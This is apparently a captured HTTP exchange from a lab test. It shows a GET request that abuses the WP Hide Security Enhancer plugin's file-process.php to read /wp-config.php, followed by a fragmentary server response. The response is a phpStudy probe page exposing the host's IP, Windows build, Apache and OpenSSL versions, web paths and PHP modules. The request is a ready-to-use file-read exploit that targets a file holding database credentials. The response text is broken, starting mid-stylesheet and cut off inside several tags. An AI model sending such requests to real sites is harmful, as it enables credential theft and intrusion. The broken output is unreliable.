GET /pte/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1
Host: 192.168.203.178
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip




6px; border:1px solid #CCCCCC;}
input{padding: 2px; background: #FFFFFF; border-top:1px solid #666666; border-left:1px solid #666666; border-right:1px solid #CCCCCC; border-bottom:1px solid #CCCCCC; font-size:12px}
input.btn{font-weight: bold; height: 20px; line-height: 20px; padding: 0 6px; color:#666666; background: #f2f2f2; border:1px solid #999;font-size:12px}
.bar {border:1px solid #999999; background:#FFFFFF; height:5px; font-size:2px; width:89%; margin:2px 0 5px 0;padding:1px;overflow: hidden;}
.bar_1 {border:1px dotted #999999; background:#FFFFFF; height:5px; font-size:2px; width:89%; margin:2px 0 5px 0;padding:1px;overflow: hidden;}
.barli_red{background:#ff6600; height:5px; margin:0px; padding:0;}
.barli_blue{background:#0099FF; height:5px; margin:0px; padding:0;}
.barli_green{background:#36b52a; height:5px; margin:0px; padding:0;}
.barli_1{background:#999999; height:5px; margin:0px; padding:0;}
.barli{background:#36b52a; height:5px; margin:0px; padding:0;}
#page {width: 920px; padding: 0 20px; margin: 0 auto; text-align: left;}
#header{position: relative; padding: 10px;}
#footer {padding: 15px 15px; text-align: left; font-size: 12px; font-family: Tahoma, Verdana;line-height:16px}
#lnmplink {position: absolute; top: 15px; left: 200px; text-align: right; font-weight: bold; color: red;}
#lnmplink a {color: #FF0000; text-decoration: underline;font-size:20px}
#lnmplink2 {position: absolute; top: 20px; right: 80px; t


ext-align: right; font-weight: bold; color: #06C;}
#lnmplink2 a {color: #0000FF; text-decoration: underline;}
.w_small{font-family: Courier New;}
.w_number{color: #f800fe;}
.sudu {padding: 0; background:#5dafd1; }
.suduk { margin:0px; padding:0;}
.resNo{color: #FF0000;}
.word{word-break:break-all;}
-->
</style>

</head>
<body>

<div id="page">
    <div id="header">
        <h1>phpStudy </h1>
         <div id="lnmplink"><a href="./list.htm" target="_blank">PHP</a></div>
         
         <div id="lnmplink2">not <a href="http://www.phpstudy.net/a.php/192.html" target="_blank"> phpStudy </a></div>
    </div>

<!---->
<table width="100%" cellpadding="3" cellspacing="0">
  <tr><th colspan="4"></th></tr>
  <tr>
    <td>/IP</td>
    <td colspan="3">192.168.203.178(192.168.203.178)</td>
  </tr>
  <tr>
    <td></td>
    <td colspan="3">Windows NT DESKTOP-0E6SVBJ 6.2 build 9200 (Windows 8 Business Edition) AMD64</td>
  </tr>
  <tr>
    <td width="13%"></td>
    <td width="37%">Windows &nbsp;NT</td>
    <td width="13%"></td>
    <td width="37%">Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02</td>
  </tr>
  <tr>
    <td></td>
    <td>en</td>
    <td></td>
    <td>80</td>
  </tr>
  <tr>




	  <td></td>
	  <td>DESKTOP-0E6SVBJ</td>
	  <td></td>
	  <td>C:/phpstudy_pro/WWW</td>
	</tr>
  <tr>
	  <td></td>
	  <td>admin@example.com</td>
		<td></td>
		<td>C:/phpstudy_pro/WWW/index.php</td>
	</tr>
</table>


<table width="100%" cellpadding="3" cellspacing="0" align="center">
  <tr>
    <th colspan="4">PHP</th>
  </tr>
  <tr>
    <td colspan="4"><span class="w_small">
Core&nbsp;&nbsp;bcmath&nbsp;&nbsp;calendar&nbsp;&nbsp;ctype&nbsp;&nbsp;date&nbsp;&nbsp;ereg&nbsp;&nbsp;filter&nbsp;&nbsp;ftp&nbsp;&nbsp;hash&nbsp;&nbsp;iconv&nbsp;&nbsp;json&nbsp;&nbsp;mcrypt&nbsp;&nbsp;SPL&nbsp;&nbsp;<br />odbc&nbsp;&nbsp;pcre&nbsp;&nbsp;Reflection&nbsp;&nbsp;session&nbsp;&nbsp;standard&nbsp;&nbsp;mysqlnd&nbsp;&nbsp;tokenizer&nbsp;&nbsp;zip&nbsp;&nbsp;zlib&nbsp;&nbsp;libxml&nbsp;&nbsp;dom&nbsp;&nbsp;PDO&nbsp;&nbsp;openssl&nbsp;&nbsp;<br />SimpleXML&nbsp;&nbsp;wddx&nbsp;&nbsp;xml&nbsp;&nbsp;xmlreader&nbsp;&nbsp;xmlwriter&nbsp;&nbsp;cgi-fcgi&nbsp;&nbsp;curl&nbsp;&nbsp;fileinfo&nbsp;&nbsp;gd&nbsp;&nbsp;mbstring&nbsp;&nbsp;mysql&nbsp;&nbsp;mysqli&nbsp;&nbsp;Phar&nbsp;&nbsp;<br />pdo_mysql&nbsp;&nbsp;pdo_sqlite&nbsp;&nbsp;mhash&nbsp;&nbsp;</span>
    </td>
  </tr>
</table>
<table width="100%" cellpadding="3" cellspacing="0" align="center">
  <tr><th colspan="4">PHP</th></tr>
  <tr>
    <td width="32%">PHPphpinfo</td>
    


d"></font></td>
  </tr>
  <tr>
    <td>Calendar</td>
    <td><font color="green"></font>	</td>
    <td>URL</td>
    <td><font color="green"></font></td>
  </tr>
  <tr>
    <td>GD</td>
    <td>
    bundled (2.1.0 compatible)</td>
    <td>(Zlib)</td>
    <td><font color="green"></font></td>
  </tr>
  <tr>
    <td>IMAP</td>
    <td><font color="red"></font></td>
    <td></td>
    <td><font color="green"></font></td>
  </tr>
  <tr>
    <td></td>
    <td><font color="green"></font></td>
    <td>WDDX</td>
    <td><font color="green"></font></td>
  </tr>
  <tr>
    <td>Iconv</td>
    <td><font color="green"></font></td>
    <td>mbstring</td>
    <td><font color="green"></font></td>
  </tr>
  <tr>
    <td></td>
    <td><font color="green"></font></td>
    <td>LDAP</td>
    <td><font color="red"></font></td>
  </tr>
  <tr>
    <td>MCrypt</td>
    <td><font color="green"></font></td>
    <td></td>
    <td><font color="green"></font></td>
  </tr>
</table>

<!---->
<table width="100%" cellpadding="3" cellspacing="0" align="center">
  <tr><th colspan="4" ></th></tr>
  <tr>
    <td width="32%">


Zend</td>
    <td width="18%">2.6.0</td>
    <td width="32%">
ZendGuardLoader[]	</td>
    <td width="18%"><font color=red></font></td>
  </tr>
  <tr>
    <td>eAccelerator</td>
    <td><font color=red></font></td>
    <td>ioncube</td>
    <td><font color=red></font></td>
  </tr>
  <tr>
    <td>XCache</td>
    <td><font color=red></font></td>
    <td>APC</td>
    <td><font color=red></font></td>
  </tr>
</table>

<!---->
<table width="100%" cellpadding="3" cellspacing="0" align="center">
  <tr><th colspan="4"></th></tr>
  <tr>
    <td width="32%">MySQL </td>
    <td width="18%"><font color="green"></font>    	</td>
    <td width="32%">ODBC </td>
    <td width="18%"><font color="green"></font></td>
  </tr>
  <tr>
    <td>Oracle </td>
    <td><font color="red"></font></td>
    <td>SQL Server </td>
    <td><font color="red"></font></td>
  </tr>
  <tr>
    <td>dBASE </td>
    <td><font color="red"></font></td>
    <td>mSQL </td>
    <td><font color="red"></font></td>
  </tr>
  <tr>
    <td>SQLite </td>
    <td><font color="red"></font></td>
    <td>Hyperwave </td>
    <td><font color="red"></font></td>
  </tr>
  <tr>
    <td>Postgre SQL </td>
    <td><font color="red"></font></td>
    <td>Informix </td>



    <td><font color="red"></font></td>
  </tr>
  <tr>
    <td>DBA </td>
    <td><font color="red"></font></td>
    <td>DBM </td>
    <td><font color="red"></font></td>
  </tr>
  <tr>
    <td>FilePro </td>
    <td><font color="red"></font></td>
    <td>SyBase </td>
    <td><font color="red"></font></td>
  </tr> 
</table>

<form action="/index.php#bottom" method="post">
<!--MySQL-->
<table width="100%" cellpadding="3" cellspacing="0" align="center">
	<tr><th colspan="3">MySQL</th></tr>
  <tr>
    <td width="15%"></td>
    <td width="60%">
      <input type="text" name="host" value="localhost" size="10" />
      <input type="text" name="port" value="3306" size="10" />
      <input type="text" name="login" size="10" />
      <input type="password" name="password" size="10" />
    </td>
    <td width="25%">
      <input class="btn" type="submit" name="act" value="MySQL" />
    </td>
  </tr>
</table>
  <!---->
<table width="100%" cellpadding="3" cellspacing="0" align="center">
	<tr><th colspan="3"></th></tr>
  <tr>
    <td width="15%"></td>
    <td width="60%">
      
      <input type="text" name="funName" size="50" />
    </td>
    <td width="25%">
      <input class="btn" type="submit" name="act" al


ign="right" value="" />
    </td>
  </tr>
  </table>

</form>

<div id="footer">
<p>phpStudyApache+Nginx+IIS+Lighttpd+PHP+MySQL+phpMyAdmin+SQL-Front+Zend LoaderPHPPHPPHPWINDOWS
 <a href="http://www.phpstudy.net/" target="_blank">www.phpstudy.net</a></p>
</div>

</div>
</body>
</html>
0




